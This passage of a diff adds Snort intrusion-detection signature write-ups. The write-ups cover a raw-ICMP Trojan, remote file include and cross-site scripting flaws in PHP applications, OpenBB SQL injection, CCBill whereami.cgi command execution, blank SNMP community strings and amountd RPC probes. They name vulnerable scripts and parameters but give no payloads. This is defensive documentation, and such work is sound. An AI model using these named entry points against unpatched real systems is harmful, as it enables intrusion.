+A FTP server blocks access to the ftp users homedir. A misconfiguration might allow an attacker to access the ftp users home directory.
+
+This home folder might contain critical files.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Visit http://httpd.apache.org/docs for UserDir configuration options or 
+remove UserDir module if not needed.
+
+Configure the ftp user to use a non-interactive nologin shell that does 
+not require a home directory.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/183.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+183
+
+--
+Summary:
+Q is a Trojan Horse offering the attacker remote access to the victim 
+host. This event is generated when raw ICMP packets are sent to the 
+victim server.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems.
+
+The Trojan is controlled by sending raw packets (TCP/UDP/ICMP) to the 
+victim host containing commands to be run as root.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. The 
+attacker can then choose to send raw data to the victim via TCP/UDP/ICMP
+from the broadcast address of a class C network.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Traffic originating from a broadcast address should not be allowed from 
+external sources or from internal sources to external destinations. 
+Judicious use of firewall rules is necessary.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS202
+
+--
--- /dev/null
+++ b/doc/signatures/2425.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2425
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000545.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000545
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHP Blue Dragon CMS" application running on a 
+webserver. Access to the file "team_admin.php" using a remote file being passed 
+as the "DragonRootPath" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DragonRootPath" parameter in the "team_admin.php" 
+script used by the "PHP Blue Dragon CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Blue Dragon CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1432.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1432
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This 
+may be against corporate policy. p2p clients connect to other p2p 
+clients to share files, commonly music and video files but can be 
+configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to 
+transfer company confidential information to unauthorized hosts external
+to the protected network bypassing other security measures in place.
+
+This rule detects activity from Gnutella p2p client applications.
+
+--
+Affected Systems:
+	Any host using a Gnutella p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+GNUTella
+http://www.gnutella.com
+
+Gnutella Protocol
+http://rfc-gnutella.sourceforge.net/developer/testing/
+
+--
--- /dev/null
+++ b/doc/signatures/100000455.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000455
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Axent Forum" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "startrow" parameter in the "viewposts.cfm" 
+script used by the "Axent Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Axent Forum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000836.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000836
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MiniBB" application running on a webserver. Access to the file "com_minibb.php" using a remote file being passed as the "absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "absolute_path" parameter in the "com_minibb.php" script used by the "MiniBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MiniBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/119-14.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+119-14
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of non-standard RFC defined characters are used in a web request.
+
+The characters generating the events are user configured.
+
+--
+Affected Systems:
+	All web servers
+
+--
+Attack Scenarios: 
+An attacker may use non-standard characters in a request in an attempt
+to evade an IDS in the course of an attack against a web server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/100000716.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000716
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "users.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "users.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/448.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+448
+
+--
+Summary:
+This event is generated when an ICMP "Source Quench" message is 
+generated that has a non-zero ICMP code.  
+
+--
+Impact:
+Informational.  This may indicate that the ICMP message has been 
+crafted.
+
+--
+Detailed Information:
+An ICMP "Source Quench" message is issued by a network device that 
+cannot handle the current volume of traffic.  The ICMP code value for 
+this message should be 0.  If a non-zero ICMP code is observed, it may 
+be an indication that the packet was crafted with an invalid value.
+
+ICMP Source Quench messages may be normally sent by either a gateway or 
+a host as a congestion control mechanism. A gateway would send them if 
+it is running out of buffer space (needed to queue datagrams for output 
+to the next hop) or by a host that is receiving datagrams too fast to 
+process. Maliciously crafted ICMP Source Quench Messages may be used to 
+force a remote host to slow down its transmission rate and causing a 
+Denial of Service.
+
+--
+Affected Systems:
+This traffic should have no adverse impact.
+
+--
+Attack Scenarios:
+An attacker may craft an ICMP "Source Quench" message with an invalid 
+ICMP code.  A single packet itself is not harmful, but the unusual ICMP 
+code my indicate that this packet was abnormally generated.
+
+--
+Ease of Attack:
+Simple. There are many packages available to generate ICMP messages.
+
+--
+False Positives:
+Although rare, it is possible to observe an ICMP "Source Quench" message
+with a non-zero type code generated by software that does not conform to standards.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+If a routing device in your network is generating this message, investigate why it does not have a standard ICMP code of 0.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Additional information by Jose Hernandez <jrseal76@hotmail.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000798.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000798
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "c3" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000109.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000109
+
+-- 
+Summary: 
+This event is generated when an SQL injection attempt is made against the 
+OpenBB web bulliten board system.
+
+-- 
+
+Impact: 
+Attackers may run arbitrary database commands with the privileges of the 
+affected script.
+
+--
+Detailed Information:
+This rule looks specifically for attacks against the member.php module of the 
+OpenBB program. Attackers must supply a variable whose value is numeric, 
+followed by a space, in order to exploit this vulnerability.
+
+--
+Affected Systems:
+OpenBB 1.0.5
+OpenBB 1.1.0
+
+--
+
+Attack Scenarios: 
+A web browser or a script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as example attacks that can be used with a web browser are publicly 
+available.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, no vendor-supplied patches are available. A descripton of an 
+unverified workaround is available in the Additional References section.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+http://www.securityfocus.com/archive/1/319714
+
+-- 
--- /dev/null
+++ b/doc/signatures/850.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+850
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1893.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1893
+
+--
+Summary:
+This event is generated when SNMP communications do not contain a 
+community name.
+
+--
+Impact:
+Medium to Serious. Depending on if the community string was for 
+read-only, read-create or read-write an attacker could gain a varying 
+level of access to a system.
+
+--
+Detailed Information:
+An SNMP community string is the authentication process that a host 
+running SNMP uses to grant access. By supplying a blank community string
+and attacker may be attempting to gain access to SNMP functionality for
+a device that has not been configured correctly.
+
+--
+Affected Systems:
+Numerous. Routers, switches, servers, NAS systems, many others.
+
+--
+Attack Scenarios:
+An attacker can launch a scan of all network attached devices looking 
+for port 161 (UDP) and then attempt to gain access using SNMP.
+
+--
+Ease of Attack:
+Simple. There are many free SNMP "tree walking" programs, an example of 
+such is getIF.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Ensure that all devices using SNMP have a community string assigned.
+
+Make sure that all devices that have SNMP turned on have complex 
+passwords assigned.
+
+Disable unneeded WRITE / CREATE community strings.
+
+Since SNMP traffic is not encrypted, use a packet filtering firewall to 
+restrict SNMP communications to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+
+GetIF:
+http://www.wtcs.org/snmp4tpc/getif.htm
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
--- /dev/null
+++ b/doc/signatures/2396.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+2396
+
+--
+Summary:
+This event is generated when an attacker attempts to execute an arbitrary command on a web server running the CCBill software. 
+
+--
+Impact:
+Execution of arbitrary commands.
+
+--
+Detailed Information:
+The CCBill software is available to manage credit card information for UNIX and Windows hosts.  The script whereami.cgi is used for technical support of the software.  A vulnerability exists in the whereami.cgi script that allows the execution of arbitrary commands from an attacker who passes a command via whereami.cgi?g=command format in a URL.  Supplied commands can list file names, show the contents of the password file, or install a backdoor to name a few actions that an attacker may attempt.
+
+--
+Affected Systems:
+Hosts running CCBill software that has the whereami.cgi in the server's CGI path.
+
+--
+Attack Scenarios:
+An attacker can send a request to execute an arbitrary command.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the whereami.cgi command.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+bugtraq
+http://www.securityfocus.com/bid/8095
+
+--
--- /dev/null
+++ b/doc/signatures/2433.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+2433
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Possible unauthorized administrative access to the server or application.
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+MDaemon is mail server software for Microsoft Windows systems. It uses a
+CGI web interface to send email. The email form used to submit the
+message does not properly check user supplied input. This may result in
+an attacker being able to supply a "From" field larger than 249 bytes
+which may in turn cause an error condition to occur in the executable
+file handling the form input. This error may present the attacker with
+the opportunity to gain administrative access to the server and also
+execute code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running on a web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	Alt-N MDaemon 6.5.2
+	Alt-N MDaemon 6.7.5, 6.7.9
+	Alt-N MDaemon 6.8.0 through 6.8.5
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000566.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000566
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "XennoBB" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "tid" parameter in the "messages.php" script 
+used by the "XennoBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using XennoBB
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2428.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2428
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000490.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000490
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ISPConfig" application running on a webserver. 
+Access to the file "trylogin.php" using a remote file being passed as the 
+"go_info[isp][classes_root]" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "go_info[isp][classes_root]" parameter in the 
+"trylogin.php" script used by the "ISPConfig" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ISPConfig
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1263.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1263
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) amountd (also known as autofsd) is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port amountd is using.  Attackers can also learn what versions of the amountd protocol are accepted by amountd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as amountd run.  The amountd RPC service is used by UNIX hosts to automatically mount and unmount autofs files.  It can use name service maps to find file systems to mount.  A vulnerability is present in autofsd that allows an attacker to execute arbitrary commands.  The attacker requests a map name that is executable followed by a malformed client key and commands execute.  The server improperly interprets the input and executes the commands.
+
+--
+Affected Systems:
+IBM AIX 4.3, SGI IRIX 6.2, 6.3, 6.4, 6.5, and 6.5.1.
+
+--
+Attack Scenarios:
+An attacker can craft an amountd request that executes arbitrary commands on the remote file system. 
+
+--
+Ease of Attack:
+Easy.  Exploit code is widely available.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access amountd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for amountd, not probes of the amountd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the amountd service itself. An attacker may attempt to go directly to the amountd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Original rule modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/332/info/
+
+Arachnids:
+http://www.whitehats.com/info/IDS19
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000362.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000362
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "rechnung.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "rechnung.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
